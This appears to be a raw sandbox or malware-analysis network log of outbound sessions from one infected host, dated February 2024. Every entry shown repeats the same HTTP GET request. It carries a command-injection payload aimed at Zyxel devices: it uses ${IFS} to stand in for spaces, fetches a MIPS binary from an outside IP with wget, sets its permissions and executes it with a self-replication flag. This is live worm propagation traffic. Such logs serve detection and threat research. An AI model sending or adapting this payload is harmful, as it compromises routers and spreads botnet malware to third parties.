                                                        Feb 2, 2024 06:21:03.816263914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3035192.168.2.1445156178.109.59.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816324949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3036192.168.2.1434294123.242.204.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816351891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3037192.168.2.1457646141.163.98.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816387892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3038192.168.2.1452104204.78.227.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816422939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3039192.168.2.1457970126.64.97.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816457033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3040192.168.2.143321839.159.188.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816483974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3041192.168.2.143409490.232.221.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816546917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3042192.168.2.1441588199.140.171.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816570997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3043192.168.2.1439242108.120.22.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816596031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3044192.168.2.1434814125.192.144.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816646099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3045192.168.2.1436834164.193.151.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816704035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3046192.168.2.1440384145.118.166.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816730976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3047192.168.2.1445766136.101.5.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816786051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3048192.168.2.143731641.70.191.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816824913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3049192.168.2.1453992196.177.124.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816855907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3050192.168.2.146037043.148.172.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816895962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3051192.168.2.14464721.98.98.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816956997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3052192.168.2.1437490193.116.226.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.816988945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3053192.168.2.1437090106.69.33.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.817012072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3054192.168.2.1448816199.62.149.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.817064047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3055192.168.2.143501671.116.180.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.817096949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3056192.168.2.14346428.21.139.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.817128897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3057192.168.2.1445466117.142.181.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.817186117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3058192.168.2.143938893.92.224.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.817228079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3059192.168.2.1439896112.99.173.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.817256927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3060192.168.2.14532148.23.67.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.817291021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3061192.168.2.1457738187.13.201.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.820976019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3062192.168.2.144925245.27.185.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821008921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3063192.168.2.1443764142.127.128.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821068048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3064192.168.2.1443920153.104.57.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821103096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3065192.168.2.1454724142.171.241.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821131945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3066192.168.2.143610865.255.163.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821167946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3067192.168.2.1439056140.246.183.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821225882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3068192.168.2.145304670.33.193.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821250916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3069192.168.2.143344437.2.222.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821297884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3070192.168.2.1442966133.239.111.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821332932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3071192.168.2.143461275.122.215.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821377993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3072192.168.2.1440404198.224.208.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821429968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3073192.168.2.143785487.171.147.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821460009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3074192.168.2.1438780122.13.207.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821487904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3075192.168.2.1452728133.220.110.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821541071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3076192.168.2.14340561.74.59.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821588039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3077192.168.2.1438054102.51.50.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821623087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3078192.168.2.1444078212.255.134.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821677923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3079192.168.2.144944049.66.124.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821712971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3080192.168.2.1435042130.47.229.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821753979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3081192.168.2.1449108133.217.34.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821791887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3082192.168.2.1438742157.137.46.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821839094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3083192.168.2.143670459.202.221.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.821858883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3084192.168.2.1437008189.49.152.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830414057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3085192.168.2.146072224.36.134.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830462933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3086192.168.2.144675278.179.160.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830482960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3087192.168.2.145612894.180.130.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830534935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3088192.168.2.14507021.112.251.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830569029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3089192.168.2.1455656221.219.13.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830599070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3090192.168.2.145178295.44.216.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830636978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3091192.168.2.145040081.181.59.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830697060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3092192.168.2.144418457.63.130.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830754042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3093192.168.2.145020095.188.44.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830761909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3094192.168.2.14356785.19.223.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830790997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3095192.168.2.143529482.69.13.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830841064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3096192.168.2.1438784141.105.249.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.830889940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3097192.168.2.1442812124.26.152.206443
                                                        TimestampBytes transferredDirectionData
